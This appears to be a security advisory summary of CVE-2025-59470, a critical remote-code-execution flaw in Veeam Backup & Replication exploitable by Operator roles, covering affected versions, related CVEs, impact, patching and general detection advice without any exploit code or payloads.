Full Report
Veeam has released security updates to address multiple flaws in its Backup & Replication software, including a "critical" issue that could result in remote code execution (RCE). The vulnerability, tracked as CVE-2025-59470, carries a CVSS score of 9.0. "This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as the postgres user by sending a malicious
Analysis Summary
# Vulnerability: Critical RCE in Veeam Backup & Replication via Operator Roles
## CVE Details
- CVE ID: CVE-2025-59470
- CVSS Score: 9.0 (Critical)
- CWE: Not explicitly stated, but related to improper input validation leading to RCE.
## Affected Systems
- Products: Veeam Backup & Replication
- Versions: 13.0.1.180 and all earlier versions of 13 builds.
- Configurations: Exploitation is possible by a user holding the **Backup Operator** or **Tape Operator** role.
## Vulnerability Description
This vulnerability allows a low-privileged authenticated user (Backup Operator or Tape Operator) to achieve Remote Code Execution (RCE) by sending specifically crafted input. The attack involves submitting a malicious **interval** or **order** parameter, resulting in RCE being executed with the privileges of the **postgres** user.
*(Note: Three other vulnerabilities were also noted affecting the same versions: CVE-2025-55125 (RCE as root via backup configuration file by Operator roles, CVSS 7.2), CVE-2025-59468 (RCE as postgres by Backup Administrator via password parameter, CVSS 6.7), and CVE-2025-59469 (File write as root by Operator roles, CVSS 7.2). This summary focuses primarily on the critical CVE-2025-59470.)*
## Exploitation
- Status: Not explicitly stated as exploited in the wild, but PoC is likely possible given vendor bulletin release after flaw discovery.
- Complexity: Assumed **Medium** as it requires authenticated access with specific, though commonly existing, operator roles.
- Attack Vector: Likely **Network** (remote) if the operator role interface is network accessible.
## Impact
- Confidentiality: High (RCE as postgres user likely exposes sensitive backup data or configuration).
- Integrity: High (Ability to execute arbitrary code).
- Availability: High (RCE could lead to service disruption).
## Remediation
### Patches
- Apply the security update to **Veeam Backup & Replication version 13.0.1.1071** or newer.
### Workarounds
- The vendor suggests customers follow Veeam's recommended **Security Guidelines** to reduce the opportunity for exploitation. (Specific initial mitigations were not detailed beyond applying the patch.)
## Detection
- Detection signatures would focus on monitoring for inputs containing malicious data within the network traffic directed at the service endpoints responsible for processing 'interval' or 'order' parameters by authenticated Backup or Tape Operator users.
- Investigate the **postgres** user process activity for anomalous command execution if an intrusion is suspected.
## References
- Vendor Advisory: hxxps://www.veeam.com/kb4792
- Affected Product Document: hxxps://helpcenter.veeam.com/docs/vbr/userguide/configure_roles.html?ver=13
- Security Guidelines: hxxps://helpcenter.veeam.com/docs/vbr/userguide/security_guidelines.html?ver=13